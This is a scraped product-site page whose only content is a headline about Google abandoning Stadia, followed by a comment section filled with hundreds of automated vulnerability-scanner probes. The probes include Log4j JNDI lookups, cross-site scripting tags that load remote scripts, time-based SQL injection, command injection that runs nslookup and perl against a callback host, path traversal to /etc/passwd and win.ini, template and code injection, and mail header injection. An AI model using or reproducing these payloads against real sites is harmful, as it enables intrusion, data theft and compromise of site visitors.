ے
Search
KWD
English
Shopping cart Close

You have no items in your shopping cart.

Back to all

جوجل تتخلى عن مشروعها ستاديا

06 Feb 2022

Comments
Leave your comment Close
Mr.

555

Mr.

${j${::-n}di:dns${::-:}${::-/}/hitwvmommvzrv70221${::-.}bxss.me}zzzz

Mr.

%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitxopnqfeevcb7bf5${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Mr.

response.write(9233753*9192187)

Mr.

'+response.write(9233753*9192187)+'

Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-188593.58.db8e7${::-.}1${::-.}bxss.me}}

Mr.

"+response.write(9233753*9192187)+"

${j${::-n}di:dns${::-:}${::-/}/hiteoyqwhnauqf1009${::-.}bxss.me}zzzz

555

Mr.

555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-188594&h=58-db8e7-2&"></script>

response.write(9495057*9215849)

555

Mr.'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-188595&h=58-db8e7-2&"></script>

555

'+response.write(9495057*9215849)+'

555

"+response.write(9495057*9215849)+"

555

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-188597.58.db8e7${::-.}1${::-.}bxss.me}}

555

Mr.

555

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

/../../../../../../../../../../windows/system32/BITSADMIN.exe

555

Mr.

echo lsmmtr$()\ ghzmmp\nz^xyu||a #' &echo lsmmtr$()\ ghzmmp\nz^xyu||a #|" &echo lsmmtr$()\ ghzmmp\nz^xyu||a #

Mr.

&echo oolgbs$()\ jnskpt\nz^xyu||a #' &echo oolgbs$()\ jnskpt\nz^xyu||a #|" &echo oolgbs$()\ jnskpt\nz^xyu||a #

Mr.

|echo fyixyv$()\ iqofbd\nz^xyu||a #' |echo fyixyv$()\ iqofbd\nz^xyu||a #|" |echo fyixyv$()\ iqofbd\nz^xyu||a #

Mr.

t5EFtU7g

Mr.

../../../../../../../../../../../../../../etc/passwd

Oz9jpBku

555

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

(nslookup hitrumpchoowh1bf67.bxss.me||perl -e "gethostbyname('hitrumpchoowh1bf67.bxss.me')")

Mr.

555

Mr.

file:///etc/passwd

Mr.

$(nslookup hitmjnlvgaidh43c01.bxss.me||perl -e "gethostbyname('hitmjnlvgaidh43c01.bxss.me')")

Mr.

555

Mr.

&(nslookup hitbaaygaplfs7ef28.bxss.me||perl -e "gethostbyname('hitbaaygaplfs7ef28.bxss.me')")&'\"`0&(nslookup hitbaaygaplfs7ef28.bxss.me||perl -e "gethostbyname('hitbaaygaplfs7ef28.bxss.me')")&`'

Mr.

../555

Mr.

555
bcc:074625.58-188601.58.db8e7.19244.2@bxss.me

Mr.

|(nslookup hitqkablwglxzbb3a9.bxss.me||perl -e "gethostbyname('hitqkablwglxzbb3a9.bxss.me')")

Mr.

555<esi:include src="http://bxss.me/rpb.png"/>

Mr.

to@example.com>
bcc:074625.58-188602.58.db8e7.19244.2@bxss.me

../../../../../../../../../../../../../../etc/passwd

555

Mr.<esi:include src="http://bxss.me/rpb.png"/>

555

Mr.

`(nslookup hitdlumyuhejt0c8d3.bxss.me||perl -e "gethostbyname('hitdlumyuhejt0c8d3.bxss.me')")`

Mr. bcc:074625.58-188603.58.db8e7.19244.2@bxss.me

555

../../../../../../../../../../../../../../windows/win.ini

555

to@example.com> bcc:074625.58-188604.58.db8e7.19244.2@bxss.me

555

file:///etc/passwd

555

Mr.

;(nslookup hitckiudebrtp08199.bxss.me||perl -e "gethostbyname('hitckiudebrtp08199.bxss.me')")|(nslookup hitckiudebrtp08199.bxss.me||perl -e "gethostbyname('hitckiudebrtp08199.bxss.me')")&(nslookup hitckiudebrtp08199.bxss.me||perl -e "gethostbyname('hitckiudebrtp08199.bxss.me')")

Mr.

555

Mr.

555

Mr.

555

../Mr.

555

echo xebamb$()\ ljylgi\nz^xyu||a #' &echo xebamb$()\ ljylgi\nz^xyu||a #|" &echo xebamb$()\ ljylgi\nz^xyu||a #

555

&echo yxyvwo$()\ lcabic\nz^xyu||a #' &echo yxyvwo$()\ lcabic\nz^xyu||a #|" &echo yxyvwo$()\ lcabic\nz^xyu||a #

555

Mr.

${9999871+9999559}

|echo gubgog$()\ uivmno\nz^xyu||a #' |echo gubgog$()\ uivmno\nz^xyu||a #|" |echo gubgog$()\ uivmno\nz^xyu||a #

555

Mr.

555

${10000214+10000112}

555

(nslookup hitfejpntztkh641b1.bxss.me||perl -e "gethostbyname('hitfejpntztkh641b1.bxss.me')")

555

Mr.

555

Mr.

555

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

$(nslookup hitdaalreblxxd3bda.bxss.me||perl -e "gethostbyname('hitdaalreblxxd3bda.bxss.me')")

555

Mr.

555&n921484=v964441

Mr.

Http://bxss.me/t/fit.txt

Mr.

http://bxss.me/t/fit.txt?.jpg

Mr.

/etc/shells

&(nslookup hitwhtcoolpdne458e.bxss.me||perl -e "gethostbyname('hitwhtcoolpdne458e.bxss.me')")&'\"`0&(nslookup hitwhtcoolpdne458e.bxss.me||perl -e "gethostbyname('hitwhtcoolpdne458e.bxss.me')")&`'

555

Mr.

c:/windows/win.ini

Mr.&n934856=v904780

555

Mr.

bxss.me

|(nslookup hitxbrcocueun284ba.bxss.me||perl -e "gethostbyname('hitxbrcocueun284ba.bxss.me')")

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.

555

Mr.

555

Http://bxss.me/t/fit.txt

555

`(nslookup hitezhaclomwhd51d6.bxss.me||perl -e "gethostbyname('hitezhaclomwhd51d6.bxss.me')")`

555

Mr.

555

Mr.

555

http://bxss.me/t/fit.txt?.

555

Mr.

-1 OR 2+570-570-1=0+0+0+1 --

/etc/shells

555

Mr.

555

Mr.

-1 OR 2+487-487-1=0+0+0+1

c:/windows/win.ini

555

Mr.

)

Mr.

-1' OR 2+435-435-1=0+0+0+1 --

bxss.me

555

Mr.

!(()&&!|*|*|

Mr.

-1' OR 2+74-74-1=0+0+0+1 or 'CUkhXoC1'='

Mr.

^(#$!@#$)(()))******

)

555

Mr.

-1" OR 2+386-386-1=0+0+0+1 --

!(()&&!|*|*|

555

^(#$!@#$)(()))******

555

Mr.

'.gethostbyname(lc('hitvx'.'qpjxgnxz747c6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(77).chr(122).chr(70).'

Mr.

".gethostbyname(lc("hitwv"."adocqqxj07897.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(85).chr(98).chr(72)."

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

';print(md5(31337));$a='

'.gethostbyname(lc('hitub'.'klyywbws2076b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(87).chr(106).chr(87).'

555

Mr.

";print(md5(31337));$a="

Mr.

'"()

Mr.

${@print(md5(31337))}

Mr.

555

".gethostbyname(lc("hitoy"."niwmtuqz81ca3.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(77).chr(112).chr(75)."

555

Mr.

${@print(md5(31337))}\

Mr.

'.print(md5(31337)).'

Mr.

555'&&sleep(27*1000)*yngkzq&&'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

Mr.

555"&&sleep(27*1000)*vuaqvr&&"

Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitlwhyiklehs08e91.'+'bxss.me')

';print(md5(31337));$a='

555

Mr.

555'||sleep(27*1000)*ehpsos||'

";print(md5(31337));$a="

555

Mr.

555"||sleep(27*1000)*wrhrzp||"

Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitlwhyiklehs08e91."+"bxss.me")+'

Mr.

HttP://bxss.me/t/xss.html?%00

${@print(md5(31337))}

555

${@print(md5(31337))}\

555

Mr.

bxss.me/t/xss.html?%00

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitlwhyiklehs08e91.'+'bxss.me')+"

'.print(md5(31337)).'

555

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitjgyhdibgkra7321.'+'bxss.me')

555

HttP://bxss.me/t/xss.html?%00

555

Mr.

"+"A".concat(70-3).concat(22*4).concat(116).concat(70).concat(110).concat(84)+(require"socket"
Socket.gethostbyname("hitog"+"teibtwwha4898.bxss.me.")[3].to_s)+"

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitjgyhdibgkra7321."+"bxss.me")+'

555

'"()

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(118).concat(81).concat(119).concat(69)+(require'socket'
Socket.gethostbyname('hitpx'+'kxnxfcth58172.bxss.me.')[3].to_s)+'

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitjgyhdibgkra7321.'+'bxss.me')+"

555

bxss.me/t/xss.html?%00

555

Mr.

%D8%AC%D9%88%D8%AC%D9%84-%D8%AA%D8%AA%D8%AE%D9%84%D9%89-%D8%B9%D9%86-%D9%85%D8%B4%D8%B1%D9%88%D8%B9%D9%87%D8%A7-%D8%B3%D8%AA%D8%A7%D8%AF%D9%8A%D8%A7

"+"A".concat(70-3).concat(22*4).concat(120).concat(87).concat(113).concat(86)+(require"socket" Socket.gethostbyname("hitos"+"uubgjuzo53bd5.bxss.me.")[3].to_s)+"

555

Mr.

555

Mr.

http://hitzyztimqjxg.bxss.me/

'+'A'.concat(70-3).concat(22*4).concat(106).concat(89).concat(113).concat(81)+(require'socket' Socket.gethostbyname('hitfe'+'oubrcrnud5a39.bxss.me.')[3].to_s)+'

555

Mr.

%D8%AC%D9%88%D8%AC%D9%84-%D8%AA%D8%AA%D8%AE%D9%84%D9%89-%D8%B9%D9%86-%D9%85%D8%B4%D8%B1%D9%88%D8%B9%D9%87%D8%A7-%D8%B3%D8%AA%D8%A7%D8%AF%D9%8A%D8%A7/.

Mr.'&&sleep(27*1000)*ahqusq&&'

555

http://hitbjttrmgwfl.bxss.me/

555

%D8%AC%D9%88%D8%AC%D9%84-%D8%AA%D8%AA%D8%AE%D9%84%D9%89-%D8%B9%D9%86-%D9%85%D8%B4%D8%B1%D9%88%D8%B9%D9%87%D8%A7-%D8%B3%D8%AA%D8%A7%D8%AF%D9%8A%D8%A7

555

Mr."&&sleep(27*1000)*dklpfx&&"

555

Mr.'||sleep(27*1000)*cckkas||'

555

Mr."||sleep(27*1000)*xovptv||"

555

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

%D8%AC%D9%88%D8%AC%D9%84-%D8%AA%D8%AA%D8%AE%D9%84%D9%89-%D8%B9%D9%86-%D9%85%D8%B4%D8%B1%D9%88%D8%B9%D9%87%D8%A7-%D8%B3%D8%AA%D8%A7%D8%AF%D9%8A%D8%A7/.

555

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

Mr.

555

Mr.

/xfs.bxss.me

Mr.

'"

/xfs.bxss.me

555

Mr.

<!--

Mr.

555'"()&%<zzz><ScRiPt >Vuu7(9606)</ScRiPt>

'"

555

<!--

555

Mr.

'"()&%<zzz><ScRiPt >Vuu7(9369)</ScRiPt>

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

5559129942

Mr.

bfg6513<s1﹥s2ʺs3ʹhjl6513

Mr.

555

Mr.

555

Mr.

bfgx4758%C0%BEz1%C0%BCz2a%90bcxhjl4758

Mr.

555

Mr.

<%={{={@{#{${dfb}}%>

Mr.

555

Mr.

555

Mr.

<th:t="${dfb}#foreach

Mr.

555

Mr.

555

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

dfb{{98991*97996}}xca

Mr.

dfb[[${98991*97996}]]xca

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

dfb__${98991*97996}__::.x

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

555<ScRiPt >Vuu7(9585)</ScRiPt>

Mr.

555<WTWAFJ>FKREW[!+!]</WTWAFJ>

Mr.

555<script>Vuu7(9358)</script>

Mr.

555<ScR<ScRiPt>IpT>Vuu7(9557)</sCr<ScRiPt>IpT>

Mr.

555<ScRiPt
>Vuu7(9952)</ScRiPt>

Mr.

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9875></ScRiPt>

Mr.

555<isindex type=image src=1 onerror=Vuu7(9743)>

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9667'>

Mr.

555<body onload=Vuu7(9139)>

Mr.

555<img src=//xss.bxss.me/t/dot.gif onload=Vuu7(9649)>

Mr.

555<img src=xyz OnErRor=Vuu7(9950)>

Mr.

555<img/src=">" onerror=alert(9192)>

Mr.

%35%35%35%3C%53%63%52%69%50%74%20%3E%56%75%75%37%289529%29%3C%2F%73%43%72%69%70%54%3E

Mr.

555\u003CScRiPt\Vuu7(9754)\u003C/sCripT\u003E

Mr.

-1; waitfor delay '0:0:15' --

Mr.

555&lt;ScRiPt&gt;Vuu7(9113)&lt;/sCripT&gt;

Mr.

%F6<img zzz onmouseover=Vuu7(92451) //%F6>

Mr.

555<input autofocus onfocus=Vuu7(9285)>

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

555}body{zzz:Expre/**/SSion(Vuu7(9960))}

Mr.

555fDPyh
<ScRiPt >Vuu7(9302)</ScRiPt>

Mr.

555<WMUUYF>SHRBC[!+!]</WMUUYF>

Mr.

555<ifRAme sRc=9683.com></IfRamE>

Mr.

-1); waitfor delay '0:0:15' --

Mr.

555<aklFypU x=9257>

Mr.

555<img sRc='http://attacker-9593/log.php?

Mr.

555<aKeNTYM<

Mr.'"()&%<zzz><ScRiPt >Vuu7(9451)</ScRiPt>

555

'"()&%<zzz><ScRiPt >Vuu7(9874)</ScRiPt>

555

Mr.9772305

555

Mr.

-1)); waitfor delay '0:0:15' --

bfg6749<s1﹥s2ʺs3ʹhjl6749

555

bfgx3764%C0%BEz1%C0%BCz2a%90bcxhjl3764

555

<%={{={@{#{${dfb}}%>

555

<th:t="${dfb}#foreach

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

dfb{{98991*97996}}xca

555

dfb[[${98991*97996}]]xca

555

dfb__${98991*97996}__::.x

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

Mr.

1 waitfor delay '0:0:15' --

Mr.<ScRiPt >Vuu7(9983)</ScRiPt>

555

Mr.<WZMCLK>32F2J[!+!]</WZMCLK>

555

Mr.<script>Vuu7(9367)</script>

555

Mr.<ScR<ScRiPt>IpT>Vuu7(9780)</sCr<ScRiPt>IpT>

555

Mr.<ScRiPt >Vuu7(9645)</ScRiPt>

555

Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9150></ScRiPt>

555

Mr.<isindex type=image src=1 onerror=Vuu7(9409)>

555

Mr.

FEnFfEjF'; waitfor delay '0:0:15' --

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9459'>

555

Mr.<body onload=Vuu7(9993)>

555

Mr.<img src=//xss.bxss.me/t/dot.gif onload=Vuu7(9466)>

555

Mr.<img src=xyz OnErRor=Vuu7(9881)>

555

Mr.<img/src=">" onerror=alert(9621)>

555

%4D%72%2E%3C%53%63%52%69%50%74%20%3E%56%75%75%37%289492%29%3C%2F%73%43%72%69%70%54%3E

555

Mr.

YUS3Wv3S'); waitfor delay '0:0:15' --

Mr.\u003CScRiPt\Vuu7(9308)\u003C/sCripT\u003E

555

Mr.&lt;ScRiPt&gt;Vuu7(9144)&lt;/sCripT&gt;

555

%F6<img zzz onmouseover=Vuu7(94661) //%F6>

555

Mr.<input autofocus onfocus=Vuu7(9466)>

555

<a HrEF=http://xss.bxss.me></a>

555

<a HrEF=jaVaScRiPT:>

555

Mr.

kbctl0db')); waitfor delay '0:0:15' --

Mr.}body{zzz:Expre/**/SSion(Vuu7(9732))}

555

Mr.6POGJ <ScRiPt >Vuu7(9897)</ScRiPt>

555

Mr.<WJ5RXB>VPTIK[!+!]</WJ5RXB>

555

Mr.<ifRAme sRc=9138.com></IfRamE>

555

Mr.<ag6CdPr x=9464>

555

Mr.<img sRc='http://attacker-9554/log.php?

555

Mr.

-5 OR 415=(SELECT 415 FROM PG_SLEEP(15))--

Mr.<aBObZUi<

555

Mr.

555

Mr.

555

Mr.

-5) OR 762=(SELECT 762 FROM PG_SLEEP(15))--

Mr.

-1)) OR 460=(SELECT 460 FROM PG_SLEEP(15))--

Mr.

7yB1A2dq' OR 25=(SELECT 25 FROM PG_SLEEP(15))--

Mr.

e0tCaEoz') OR 618=(SELECT 618 FROM PG_SLEEP(15))--

Mr.

dxgsheFq')) OR 421=(SELECT 421 FROM PG_SLEEP(15))--

Mr.

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Mr.

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Mr.

1'"

Mr.

@@2jgEu

Mr.

555

Mr.

555

-1 OR 2+965-965-1=0+0+0+1 --

555

-1 OR 2+677-677-1=0+0+0+1

555

-1' OR 2+99-99-1=0+0+0+1 --

555

-1' OR 2+644-644-1=0+0+0+1 or 'TOoH86CZ'='

555

-1" OR 2+359-359-1=0+0+0+1 --

555

if(now()=sysdate(),sleep(15),0)

555

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555

1 waitfor delay '0:0:15' --

555

C4LhywKu'; waitfor delay '0:0:15' --

555

47Qszee3'); waitfor delay '0:0:15' --

555

pDigXCpT')); waitfor delay '0:0:15' --

555

1VzzyOpP' OR 204=(SELECT 204 FROM PG_SLEEP(15))--

555

UudNez8H') OR 61=(SELECT 61 FROM PG_SLEEP(15))--

555

F91TYEsz')) OR 459=(SELECT 459 FROM PG_SLEEP(15))--

555

Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555

1'"

555

@@lzC95

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

${j${::-n}di:dns${::-:}${::-/}/hitpyenqsaxkde909e${::-.}bxss.me}zzzz

Mr.

%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitnamigbdiykba625${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Mr.

response.write(9499719*9130098)

Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-208573.58.db8e7${::-.}1${::-.}bxss.me}}

Mr.

'+response.write(9499719*9130098)+'

Mr.

'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-208574&h=58-db8e7-2&"></script>

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

Mr.

"+response.write(9499719*9130098)+"

Mr.

echo lwyudv$()\ wvuscj\nz^xyu||a #' &echo lwyudv$()\ wvuscj\nz^xyu||a #|" &echo lwyudv$()\ wvuscj\nz^xyu||a #

Mr.

&echo qlqqik$()\ eglmku\nz^xyu||a #' &echo qlqqik$()\ eglmku\nz^xyu||a #|" &echo qlqqik$()\ eglmku\nz^xyu||a #

Mr.

|echo yvpvzn$()\ lrtlkk\nz^xyu||a #' |echo yvpvzn$()\ lrtlkk\nz^xyu||a #|" |echo yvpvzn$()\ lrtlkk\nz^xyu||a #

Mr.

SS4EtJrS

Mr.

(nslookup hitsqcxroytkld9c76.bxss.me||perl -e "gethostbyname('hitsqcxroytkld9c76.bxss.me')")

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

$(nslookup hitvbcrrlcsszeac2e.bxss.me||perl -e "gethostbyname('hitvbcrrlcsszeac2e.bxss.me')")

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

bcc:074625.58-208579.58.db8e7.19244.2@bxss.me

Mr.

&(nslookup hitswsgivumgy603a2.bxss.me||perl -e "gethostbyname('hitswsgivumgy603a2.bxss.me')")&'\"`0&(nslookup hitswsgivumgy603a2.bxss.me||perl -e "gethostbyname('hitswsgivumgy603a2.bxss.me')")&`'

Mr.

file:///etc/passwd

Mr.

to@example.com>
bcc:074625.58-208580.58.db8e7.19244.2@bxss.me

Mr.

|(nslookup hituruvyuyovc9b96b.bxss.me||perl -e "gethostbyname('hituruvyuyovc9b96b.bxss.me')")

Mr.

<esi:include src="http://bxss.me/rpb.png"/>

Mr.

`(nslookup hitfdzuhaeqka63b99.bxss.me||perl -e "gethostbyname('hitfdzuhaeqka63b99.bxss.me')")`

Mr.

../

Mr.

./

Mr.

;(nslookup hitvrbupnyhcpf5be0.bxss.me||perl -e "gethostbyname('hitvrbupnyhcpf5be0.bxss.me')")|(nslookup hitvrbupnyhcpf5be0.bxss.me||perl -e "gethostbyname('hitvrbupnyhcpf5be0.bxss.me')")&(nslookup hitvrbupnyhcpf5be0.bxss.me||perl -e "gethostbyname('hitvrbupnyhcpf5be0.bxss.me')")

Mr.

${10000155+10000324}

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

Mr.

&n912046=v973304

Mr.

)

Mr.

!(()&&!|*|*|

Mr.

Http://bxss.me/t/fit.txt

Mr.

http://bxss.me/t/fit.txt?.jpg

Mr.

^(#$!@#$)(()))******

Mr.

'"()

Mr.

/etc/shells

Mr.

c:/windows/win.ini

Mr.

bxss.me

Mr.

'&&sleep(27*1000)*ohzlrk&&'

Mr.

'.gethostbyname(lc('hitat'.'nqvehetdf149c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(86).chr(113).chr(80).'

Mr.

"&&sleep(27*1000)*cvtgnz&&"

Mr.

".gethostbyname(lc("hitst"."dktyuvel3a547.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(76).chr(121).chr(71)."

Mr.

'||sleep(27*1000)*wqocqe||'

Mr.

"||sleep(27*1000)*hnmfbc||"

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

';print(md5(31337));$a='

Mr.

";print(md5(31337));$a="

Mr.

${@print(md5(31337))}

Mr.

${@print(md5(31337))}\

Mr.

'.print(md5(31337)).'

Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitxvlvdwckapdb209.'+'bxss.me')

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitxvlvdwckapdb209."+"bxss.me")+'

Mr.

bxss.me/t/xss.html?%00

Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitxvlvdwckapdb209.'+'bxss.me')+"

Mr.

"+"A".concat(70-3).concat(22*4).concat(110).concat(86).concat(110).concat(89)+(require"socket"
Socket.gethostbyname("hitwk"+"gztbwmbae57d0.bxss.me.")[3].to_s)+"

Mr.

'+'A'.concat(70-3).concat(22*4).concat(118).concat(71).concat(107).concat(73)+(require'socket'
Socket.gethostbyname('hiteg'+'pfdzlxztef85e.bxss.me.')[3].to_s)+'

Mr.

-1 OR 2+306-306-1=0+0+0+1 --

Mr.

%D8%AC%D9%88%D8%AC%D9%84-%D8%AA%D8%AA%D8%AE%D9%84%D9%89-%D8%B9%D9%86-%D9%85%D8%B4%D8%B1%D9%88%D8%B9%D9%87%D8%A7-%D8%B3%D8%AA%D8%A7%D8%AF%D9%8A%D8%A7

Mr.

-1 OR 3+306-306-1=0+0+0+1 --

Mr.

http://hitvitsdofypg.bxss.me/

Mr.

-1 OR 2+609-609-1=0+0+0+1

Mr.

%D8%AC%D9%88%D8%AC%D9%84-%D8%AA%D8%AA%D8%AE%D9%84%D9%89-%D8%B9%D9%86-%D9%85%D8%B4%D8%B1%D9%88%D8%B9%D9%87%D8%A7-%D8%B3%D8%AA%D8%A7%D8%AF%D9%8A%D8%A7/.

Mr.

-1 OR 3+609-609-1=0+0+0+1

Mr.

-1' OR 2+75-75-1=0+0+0+1 --

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

-1' OR 3+75-75-1=0+0+0+1 --

Mr.

-1' OR 2+546-546-1=0+0+0+1 or 'c7zR2gW2'='

Mr.

-1' OR 3+546-546-1=0+0+0+1 or 'c7zR2gW2'='

Mr.

/xfs.bxss.me

Mr.

-1" OR 2+743-743-1=0+0+0+1 --

Mr.

-1" OR 3+743-743-1=0+0+0+1 --

Mr.

'"

Mr.

<!--

Mr.

'"()&%<zzz><ScRiPt >qUu8(9175)</ScRiPt>

Mr.

'"()&%<zzz><ScRiPt >qUu8(9334)</ScRiPt>

Mr.

9320353

Mr.

bfg8509<s1﹥s2ʺs3ʹhjl8509

Mr.

bfgx6568%C0%BEz1%C0%BCz2a%90bcxhjl6568

Mr.

<%={{={@{#{${dfb}}%>

Mr.

${j${::-n}di:dns${::-:}${::-/}/hitzpeerlzhgle8533${::-.}bxss.me}zzzz

Mr.

response.write(9886316*9760893)

Mr.

<th:t="${dfb}#foreach

Mr.

'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-209069&h=58-db8e7-2&"></script>

Mr.

'+response.write(9886316*9760893)+'

Mr.

%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitxwulzowdrs810c5${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

Mr.

"+response.write(9886316*9760893)+"

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-209071.58.db8e7${::-.}1${::-.}bxss.me}}

Mr.

echo lbwaqs$()\ axjjhb\nz^xyu||a #' &echo lbwaqs$()\ axjjhb\nz^xyu||a #|" &echo lbwaqs$()\ axjjhb\nz^xyu||a #

Mr.

dfb{{98991*97996}}xca

Mr.

UUpHVzpi

Mr.

&echo jtimna$()\ ograti\nz^xyu||a #' &echo jtimna$()\ ograti\nz^xyu||a #|" &echo jtimna$()\ ograti\nz^xyu||a #

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

dfb[[${98991*97996}]]xca

Mr.

|echo uplxyb$()\ glelom\nz^xyu||a #' |echo uplxyb$()\ glelom\nz^xyu||a #|" |echo uplxyb$()\ glelom\nz^xyu||a #

Mr.

file:///etc/passwd

Mr.

(nslookup hitjrqmnigviddb410.bxss.me||perl -e "gethostbyname('hitjrqmnigviddb410.bxss.me')")

Mr.

bcc:074625.58-209074.58.db8e7.19244.2@bxss.me

Mr.

$(nslookup hitfoeppjhwsd850d1.bxss.me||perl -e "gethostbyname('hitfoeppjhwsd850d1.bxss.me')")

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

dfb__${98991*97996}__::.x

Mr.

../

Mr.

to@example.com>
bcc:074625.58-209075.58.db8e7.19244.2@bxss.me

Mr.

./

Mr.

&(nslookup hituakbemazed00b4c.bxss.me||perl -e "gethostbyname('hituakbemazed00b4c.bxss.me')")&'\"`0&(nslookup hituakbemazed00b4c.bxss.me||perl -e "gethostbyname('hituakbemazed00b4c.bxss.me')")&`'

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

|(nslookup hitaumlxjiggia646f.bxss.me||perl -e "gethostbyname('hitaumlxjiggia646f.bxss.me')")

Mr.

<ScRiPt >qUu8(9407)</ScRiPt>

Mr.

`(nslookup hitkukxwczwnp809f0.bxss.me||perl -e "gethostbyname('hitkukxwczwnp809f0.bxss.me')")`

Mr.

${9999538+9999642}

Mr.

<esi:include src="http://bxss.me/rpb.png"/>

Mr.

<WDFCPB>UB0C2[!+!]</WDFCPB>

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

Mr.

